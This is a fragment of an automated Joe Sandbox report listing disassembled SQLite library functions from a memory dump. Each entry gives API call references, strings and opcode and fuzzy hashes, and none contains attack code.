                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                                  • String ID:
                                                                                                  • API String ID: 3386002893-0
                                                                                                  • Opcode ID: 433a07e9234c972d4e0031012a2e75f961316140f3df874b4e8739b2bf66c14d
                                                                                                  • Instruction ID: 67b356d83cd9585e7e70b929bfaf64bb6b358c899ead43a9579cabc517c74ab7
                                                                                                  • Opcode Fuzzy Hash: 433a07e9234c972d4e0031012a2e75f961316140f3df874b4e8739b2bf66c14d
                                                                                                  • Instruction Fuzzy Hash: DD619C70A042958FDB10CFA8C5A069DBBF1AF8D318F25C66DEC95AB394D730D841CB91
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep_amsg_exit
                                                                                                  • String ID:
                                                                                                  • API String ID: 1015461914-0
                                                                                                  • Opcode ID: 49dd9235c73fdf9008b63f115083f4b7708775121eba95039c402c6c214052af
                                                                                                  • Instruction ID: 0ec9c130ea502a6cd13a585d470cf09fbcbbed9e135268e3d0a189fba7ffab22
                                                                                                  • Opcode Fuzzy Hash: 49dd9235c73fdf9008b63f115083f4b7708775121eba95039c402c6c214052af
                                                                                                  • Instruction Fuzzy Hash: 27418BB16587818BEB01AFE8C58430ABBF4EB85749F21C92DD4848F340D775C8918B82
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2264764126-0
                                                                                                  • Opcode ID: d19a356a3953276cbeefdac50919968582a1f10989d8cb8510d6b6b4fab19bf8
                                                                                                  • Instruction ID: a7dcd195ea2f5d6ed875e22a8679152d8a4f94f80629a2bc9306fd3e507ff975
                                                                                                  • Opcode Fuzzy Hash: d19a356a3953276cbeefdac50919968582a1f10989d8cb8510d6b6b4fab19bf8
                                                                                                  • Instruction Fuzzy Hash: 0C317075A047968FDB009FA9C5A06ADBBF1EF8D354F24862DEC6497300D735E841CB91
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2ABA3: sqlite3_log.SQLITE3(?,?,?,?,?,61E2AC56), ref: 61E2ABDE
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E2BC18
                                                                                                  • sqlite3_value_text16le.SQLITE3 ref: 61E2BC2C
                                                                                                  • sqlite3_value_text16le.SQLITE3 ref: 61E2BC5A
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2BC6E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID: bad parameter or other API misuse$out of memory
                                                                                                  • API String ID: 3568942437-948784999
                                                                                                  • Opcode ID: 78eb4bdf06fe48c2b392aa7c69192d653b29a984b4ad70ae40819f8a2c4eba0b
                                                                                                  • Instruction ID: ebacae9846b90ff835d8ea08a6e4043ff79c41a37182a71a36f7bbcf4e5ef98a
                                                                                                  • Opcode Fuzzy Hash: 78eb4bdf06fe48c2b392aa7c69192d653b29a984b4ad70ae40819f8a2c4eba0b
                                                                                                  • Instruction Fuzzy Hash: B5014C71E447568BDB00AFB885D5619BBE8AF84258F65C8BDEC88CF305EB30D8409791
                                                                                                  APIs
                                                                                                  • strcmp.MSVCRT ref: 61E3E625
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3E65D
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3E676
                                                                                                  • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3E6AD
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3E6C6
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E3E6D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2202632817-0
                                                                                                  • Opcode ID: 7212e8bf9bb4c94a67610ab749c98a746e4e4930c95d3a52946fbd386e0ace57
                                                                                                  • Instruction ID: 99ab64b62545cf4d2a2fcbe22115e901071292b51ab4f330a7eba75489a717a1
                                                                                                  • Opcode Fuzzy Hash: 7212e8bf9bb4c94a67610ab749c98a746e4e4930c95d3a52946fbd386e0ace57
                                                                                                  • Instruction Fuzzy Hash: 18F1F374A046598FDB04CFAAC48078EBBF1AF88318F24C529D859AB359E775EC46CB41
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2585109301-0
                                                                                                  • Opcode ID: 7642a2181dea29bea9a267819ac7946627c42a1b70adba52bbf6d0754ed1a949
                                                                                                  • Instruction ID: 0ee8180db14efa06fd295bad07e7e787d323e875889d2c9ca7c465f1a61f7b21
                                                                                                  • Opcode Fuzzy Hash: 7642a2181dea29bea9a267819ac7946627c42a1b70adba52bbf6d0754ed1a949
                                                                                                  • Instruction Fuzzy Hash: 40B128B5A05205CFDB04CF68C48179AB7F1BF89318F29C46AD859AB349D734E856CFA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6db6626904b88d81a90e6ccca3a529979ed99af313a563b8a53c6b76778fb407
                                                                                                  • Instruction ID: 7572b3cf3f2c8450129e648722e635cdaa8a50528f6eac0b0000e9744e3760a7
                                                                                                  • Opcode Fuzzy Hash: 6db6626904b88d81a90e6ccca3a529979ed99af313a563b8a53c6b76778fb407
                                                                                                  • Instruction Fuzzy Hash: B1818871A056518FDB00DFA8C58065E7BFAFF85314FA4C929E849CB314E735E981CB92
                                                                                                  APIs
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E25418
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E25426
                                                                                                  • sqlite3_value_bytes.SQLITE3 ref: 61E25433
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E25461
                                                                                                  • sqlite3_result_error.SQLITE3 ref: 61E2548B
                                                                                                  • sqlite3_result_int.SQLITE3 ref: 61E254CB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                                  • String ID:
                                                                                                  • API String ID: 4226599549-0
                                                                                                  • Opcode ID: 1891837d8b780cc7e00eff26345ff794a087c3d17c1562ad13da7815c257aaf0
                                                                                                  • Instruction ID: ec9588319cc7bdc93bdaa7479f117e430ac5edfe0f7ee05c80dfa186b46890a8
                                                                                                  • Opcode Fuzzy Hash: 1891837d8b780cc7e00eff26345ff794a087c3d17c1562ad13da7815c257aaf0
                                                                                                  • Instruction Fuzzy Hash: C9213870A057459BCB00DFA9DA9059DBBF1BF89329F20C92DE4A897394D734E841CF52
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: invalid rootpage
                                                                                                  • API String ID: 0-1762523506
                                                                                                  • Opcode ID: 6e8fda54cba8e3640e28ec312cd1a4d9fb1079c0453152167a5b1e69af9245c2
                                                                                                  • Instruction ID: 0b45de3ae3e11c8c7f1084f0324e6280b00f9193b3fd0eea3bc6ed1e8da83403
                                                                                                  • Opcode Fuzzy Hash: 6e8fda54cba8e3640e28ec312cd1a4d9fb1079c0453152167a5b1e69af9245c2
                                                                                                  • Instruction Fuzzy Hash: 8A417070A043459FEB20DF68C4907AABBF1AF8A318F24C56DE8A9DB351D731D941CB51
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_strglob
                                                                                                  • String ID: $
                                                                                                  • API String ID: 476814121-227171996
                                                                                                  • Opcode ID: 327ca086ace3cb907df47ba5e7957a79c6c04124e5754500e9801dbcfe02bc1b
                                                                                                  • Instruction ID: 746dc4e5d7b4949defb47e86d2300d7a73148009f575b67e8c3df0aa89d4a177
                                                                                                  • Opcode Fuzzy Hash: 327ca086ace3cb907df47ba5e7957a79c6c04124e5754500e9801dbcfe02bc1b
                                                                                                  • Instruction Fuzzy Hash: D82138315087D28AD7118BBBC48071ABEF4BF4A31DF68D4BED4959A695E334D4A1C703
                                                                                                  APIs
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E1A480
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E1A516
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E1A447
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E1A6A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                                                                                  • String ID:
                                                                                                  • API String ID: 165182205-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_strnicmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1961171630-0
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E47E4F), ref: 61E47BCD
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E47E4F), ref: 61E47D5A
                                                                                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,61E47E4F), ref: 61E47D6C
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E47D83
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E47D8B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2921195555-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E13056: sqlite3_mutex_try.SQLITE3(?,?,?,61E130D6), ref: 61E12FF6
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E47AF6
                                                                                                  • sqlite3_mutex_free.SQLITE3 ref: 61E47B37
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E47B47
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E47B76
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E47B95
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                  • String ID:
                                                                                                  • API String ID: 1894464702-0
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E1DB65
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • memcmp.MSVCRT ref: 61E1DBD7
                                                                                                  • memcmp.MSVCRT ref: 61E1DBFC
                                                                                                  • memcmp.MSVCRT ref: 61E1DC2D
                                                                                                  • memcmp.MSVCRT ref: 61E1DC59
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 40721531-0
                                                                                                  APIs
                                                                                                  • sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E2AE73), ref: 61E2AD6C
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E2AE73), ref: 61E2AD94
                                                                                                  • sqlite3_log.SQLITE3 ref: 61E2ADB2
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E2AE73), ref: 61E2ADE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                  • String ID:
                                                                                                  • API String ID: 1015584638-0
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E47901
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E4790C
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E479C5
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E479D0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E37071
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E37089
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E370AC
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E370F0
                                                                                                  • sqlite3_memory_used.SQLITE3 ref: 61E370F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                                  • String ID:
                                                                                                  • API String ID: 2853221962-0
                                                                                                  • Opcode ID: 568a20ca79707b09826e7764169f3d2f824a62bb5cd187b1621bc7aaf6661607
                                                                                                  • Instruction ID: 5e7349674ed52e04f5f0ab7f26fbc5b041e84710451b1ffa60447d6c98e75b19
                                                                                                  • Opcode Fuzzy Hash: 568a20ca79707b09826e7764169f3d2f824a62bb5cd187b1621bc7aaf6661607
                                                                                                  • Instruction Fuzzy Hash: 95114835E54B168BCB04DFB8C89056EB7F2ABCA314B248229E854CB350D7B0E885CB80
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,61E13A99), ref: 61E0AB46
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,61E13A99), ref: 61E0AB82
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,61E13A99), ref: 61E0AB9B
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,61E13A99), ref: 61E0ABAE
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,61E13A99), ref: 61E0ABB6
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 251237202-0
                                                                                                  • Opcode ID: b7a4f35d8d33ca32c1991c793023a37f13c0beb693a6fbbf6995c383544afb7e
                                                                                                  • Instruction ID: 0f6c12f8af5b56b9377f6d76b101b1db129d68c26963f626b0986f3c82dcff3d
                                                                                                  • Opcode Fuzzy Hash: b7a4f35d8d33ca32c1991c793023a37f13c0beb693a6fbbf6995c383544afb7e
                                                                                                  • Instruction Fuzzy Hash: 4E11E2769E4B518FCB00AFB9C4C08287BF4EB8635AB15482AD449CB321E779C4949B42
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E34D92: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000,?,61E3519F), ref: 61E34CE5
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E35390
                                                                                                  • sqlite3_log.SQLITE3 ref: 61E35411
                                                                                                    • Part of subcall function 61E090F4: memcmp.MSVCRT ref: 61E0914E
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: memcmpsqlite3_freesqlite3_logsqlite3_realloc64
                                                                                                  • String ID:
                                                                                                  • API String ID: 167025251-3916222277
                                                                                                  • Opcode ID: fa5a4a1aaf05c15df15842f5f68b6a842bb32035f8e82cf148275e8a33685f69
                                                                                                  • Instruction ID: 05d689d0756adf30508b1872fd95b9b095ee7f8286179bcd00281dda828df790
                                                                                                  • Opcode Fuzzy Hash: fa5a4a1aaf05c15df15842f5f68b6a842bb32035f8e82cf148275e8a33685f69
                                                                                                  • Instruction Fuzzy Hash: FEE11770A043598FEB14CFA9C88478DBBF1AF88318F24C569D859AB396E774D885CF40
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                                  • String ID: winAccess
                                                                                                  • API String ID: 2284118020-3605117275
                                                                                                  • Opcode ID: 6267be8bda4109b66db814f2d6d4ebb383304d6baac33ac351b94171b6d6c4c5
                                                                                                  • Instruction ID: d30b5177c5328d71f16359807caca135c98dd467fd92055c6d4274a44695a23d
                                                                                                  • Opcode Fuzzy Hash: 6267be8bda4109b66db814f2d6d4ebb383304d6baac33ac351b94171b6d6c4c5
                                                                                                  • Instruction Fuzzy Hash: 6431B8B1A05249CFEB509FA8C850B5EB7F1FB85328F25C929D8649B380DB34D846DB52
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 3$d
                                                                                                  • API String ID: 0-1650181692
                                                                                                  • Opcode ID: 67aad7a9a0400007d543484fb71d23f6d820fe852bc348775cf97d4475577844
                                                                                                  • Instruction ID: 55a9cc43651ed70d43e838f31caf9ff2cbcb5e703cfb155629d202a4f1b5d9db
                                                                                                  • Opcode Fuzzy Hash: 67aad7a9a0400007d543484fb71d23f6d820fe852bc348775cf97d4475577844
                                                                                                  • Instruction Fuzzy Hash: 3A315C70A042548FDB22CFA5C880789BBF4FB46318F6485AAD8999B345D374E980CFD1
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E1CD2D
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • sqlite3_realloc.SQLITE3 ref: 61E1CD7B
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E1CD91
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                  • String ID: d
                                                                                                  • API String ID: 211589378-2564639436
                                                                                                  • Opcode ID: 8a173bfbe0902d2dee43b50e39e33b9348f2359d484d124bfbddc1d498228a9f
                                                                                                  • Instruction ID: 186a9503666e3551159deb7e988708b355772da0e80bd14209b2cc845ce353ff
                                                                                                  • Opcode Fuzzy Hash: 8a173bfbe0902d2dee43b50e39e33b9348f2359d484d124bfbddc1d498228a9f
                                                                                                  • Instruction Fuzzy Hash: B52100B1A08205CFDB00CF69C4C1B8ABBF4AF89314F648469C9489B319E778E845CBA1
                                                                                                  APIs
                                                                                                  • sqlite3_aggregate_context.SQLITE3 ref: 61E1FE6C
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_aggregate_context
                                                                                                  • String ID: "$,$\
                                                                                                  • API String ID: 2928764607-4027707629
                                                                                                  • Opcode ID: 985750401d6e333385aa22fae31d137fd42ade832726c974970416d6b5b12ab4
                                                                                                  • Instruction ID: 8dc02fc07ea195d6aa8ded8b2cf6460c84eeabe353aeb0c13fea9a3048a38754
                                                                                                  • Opcode Fuzzy Hash: 985750401d6e333385aa22fae31d137fd42ade832726c974970416d6b5b12ab4
                                                                                                  • Instruction Fuzzy Hash: 29112772E092148FD7048F69D48179ABFA5FF88724F19C12AE8088B356C339D945CBD0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                                  • String ID: <
                                                                                                  • API String ID: 2918918774-4251816714
                                                                                                  • Opcode ID: 1b6c78369e8677f43422a24d4d63817df5d9dabed496726570e73817e82e1b76
                                                                                                  • Instruction ID: 241d78d8769ad858d22b6a3d2f7a7971869353dbccfd7da2c35b0a23e4ce016c
                                                                                                  • Opcode Fuzzy Hash: 1b6c78369e8677f43422a24d4d63817df5d9dabed496726570e73817e82e1b76
                                                                                                  • Instruction Fuzzy Hash: CA116AB59043068FCB04DF6AD48098ABBF5FF88364F15C56AE4488B361E334E951CF91
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2ABA3: sqlite3_log.SQLITE3(?,?,?,?,?,61E2AC56), ref: 61E2ABDE
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E2ACE2
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E2ACFB
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2AD15
                                                                                                    • Part of subcall function 61E27C83: sqlite3_log.SQLITE3 ref: 61E27CAC
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                                                                  • String ID: out of memory
                                                                                                  • API String ID: 645246966-2599737071
                                                                                                  • Opcode ID: eaeb5d4f04b2240e7345ce3abc7e1e537745693286038efdf120484f77ac5f6c
                                                                                                  • Instruction ID: 8caeeb31c19c30b4738e64d16e9469ccd75e5ff7a5b1c36905c7be360b132cf5
                                                                                                  • Opcode Fuzzy Hash: eaeb5d4f04b2240e7345ce3abc7e1e537745693286038efdf120484f77ac5f6c
                                                                                                  • Instruction Fuzzy Hash: 08018174A486494BDB00AFB9D8D1619B7F4AF8431DF28C879DC458F701E331D9908792
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                  • API String ID: 1646373207-328863460
                                                                                                  • Opcode ID: ce5ab38425697930a800b2348ac401b836140ab2309116c1bc60823ae432f09a
                                                                                                  • Instruction ID: 88f95a5b0fc1a36e83fcc666651b847593a6fc42c27ba52e91ddc10983a2a93f
                                                                                                  • Opcode Fuzzy Hash: ce5ab38425697930a800b2348ac401b836140ab2309116c1bc60823ae432f09a
                                                                                                  • Instruction Fuzzy Hash: 1DE06DB4508B058BF7106FA5840672EBAB9AFC170EF62C81CD491862A0E634C891CB73
                                                                                                  APIs
                                                                                                  • sqlite3_malloc.SQLITE3 ref: 61E20898
                                                                                                    • Part of subcall function 61E18D74: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E189FE,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18D7C
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E209AF
                                                                                                  • sqlite3_result_error_code.SQLITE3 ref: 61E20AD2
                                                                                                  • sqlite3_result_double.SQLITE3 ref: 61E20AE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                                                                                  • String ID:
                                                                                                  • API String ID: 4229029058-0
                                                                                                  • Opcode ID: 339ce6c8fa329e2159c3165952219dd1c3493894be6fb33ea27d3c6214bf86be
                                                                                                  • Instruction ID: 45d4b300d58ab8dc2b51059bb67f3d253909563595da8c0b5c83a0b0393edce8
                                                                                                  • Opcode Fuzzy Hash: 339ce6c8fa329e2159c3165952219dd1c3493894be6fb33ea27d3c6214bf86be
                                                                                                  • Instruction Fuzzy Hash: 9DA116B0A04609DFDB01DF69C594A8EBBF5FF88314F218929E889E7354EB31D951CB81
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                                  • String ID:
                                                                                                  • API String ID: 2374424446-0
                                                                                                  • Opcode ID: 836ed8021e88d929f635eadc4386c06fcf42673ea3f0fc6bab26bbdca49803ff
